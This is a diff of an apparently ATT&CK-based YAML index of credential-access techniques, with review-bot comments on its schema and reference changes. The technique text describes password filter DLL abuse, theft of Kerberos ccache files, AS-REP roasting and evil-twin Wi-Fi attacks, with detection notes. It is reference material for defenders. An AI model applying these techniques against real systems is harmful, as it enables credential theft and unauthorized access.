description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -45044,76 +45664,129 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
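Review bot: the new T1558.005 (Ccache Files) entry has a description that starts with a literal `\n` and ends in a trailing space (`...(Citation: Kekeo) "`), and `x_mitre_detection: ''` is empty; this is inherited from upstream, but if the generator renders these fields into Markdown indexes it should strip leading and trailing whitespace so the description does not open with a blank line. Keep the misspelled citation key `Brining MimiKatz to Unix` exactly as written, since it must match the `(Citation: Brining MimiKatz to Unix)` string in the description; all six citations in that description (Kerberos GNU/Linux, Binary Defense Kerberos Linux, SpectorOps Bifrost Kerberos macOS 2019, Linux Kerberos Tickets, Brining MimiKatz to Unix, Kekeo) do have a matching external_references entry. In the same hunk T1556.002 loses `x_mitre_permissions_required: - Administrator - SYSTEM` while bumping to '2.1', the same field removal seen elsewhere in this diff.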
@@ -45148,6 +45821,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -45155,32 +45835,68 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests: []
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
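Review bot: two content changes hide inside the T1558.004 reorder: the Harmj0y reference URL changes from http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ to https://blog.harmj0y.net/activedirectory/roasting-as-reps/ with a new retrieval date (September 23, 2024), and `x_mitre_permissions_required: - User` is dropped while `x_mitre_system_requirements: - Valid domain account` is kept. The Linux ccache/SSSD and macOS ccache paragraphs removed from the T1558 description are the material now covered by the new T1558.005 sub-technique, and the text that remains in T1558 cites only ADSecurity Kerberos Ring Decoder and Microsoft Klist, neither of which is touched in this hunk.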
@@ -45216,7 +45932,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -45241,13 +45957,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
@@ -45256,14 +45965,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -45285,23 +45986,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
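Review bot: the six references removed from T1558 in this hunk and the two before it (Kekeo, SpectorOps Bifrost Kerberos macOS 2019, macOS kerberos framework MIT, MIT ccache, Brining MimiKatz to Unix, Linux Kerberos Tickets) are exactly the citations deleted from the T1558 description, so nothing in T1558 dangles. Four of them reappear under T1558.005, but MIT ccache and macOS kerberos framework MIT do not (T1558.005 cites Kerberos GNU/Linux and Binary Defense Kerberos Linux instead), so those two sources leave the file entirely unless another technique still references them. The `- spec_version: '2.1'` drop for T1558 here is consistent with the rest of the diff.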
@@ -45352,12 +46044,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests: []
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -45369,6 +46060,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
@@ -45383,18 +46075,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
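Review bot: the platform list for T1552 loses `Azure AD`, `Office 365` and `Google Workspace` and gains `Office Suite` and `Identity Provider`, which is the upstream ATT&CK platform consolidation, but any per-platform index or filter in this repository that keys on the old names will silently match nothing after regeneration. Suggest checking whether the index generator carries a mapping from the retired platform names to the new ones (for example `Google Workspace` and `Office 365` to `Office Suite`, `Azure AD` to `Identity Provider`) and adding one if it does not.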
@@ -45417,37 +46109,115 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ identifier: T1552
+ atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- identifier: T1552
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
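Review bot: the new T1557.004 (Evil Twin) entry closes with `atomic_tests: []` but has no `identifier: T1557.004` line, whereas the T1552 entry just above it gains `identifier: T1552` in this same hunk. The existing entries are already inconsistent on this key (T1555 and T1552.004 carry it, T1556.007 and T1557.003 do not), so please confirm whether `identifier` is something downstream tooling reads; if it is, the generator should emit it for every technique, including ones with no atomic tests, and if it is not, it would be cleaner to stop emitting it at all. Unrelated to that, note that the `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` context lines at the end of this hunk now belong to the Evil Twin object rather than to T1552, whose copies of those fields were moved up into its own block; that is correct YAML, just worth a second look in the rendered file.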
@@ -45455,9 +46225,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -45466,21 +46236,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
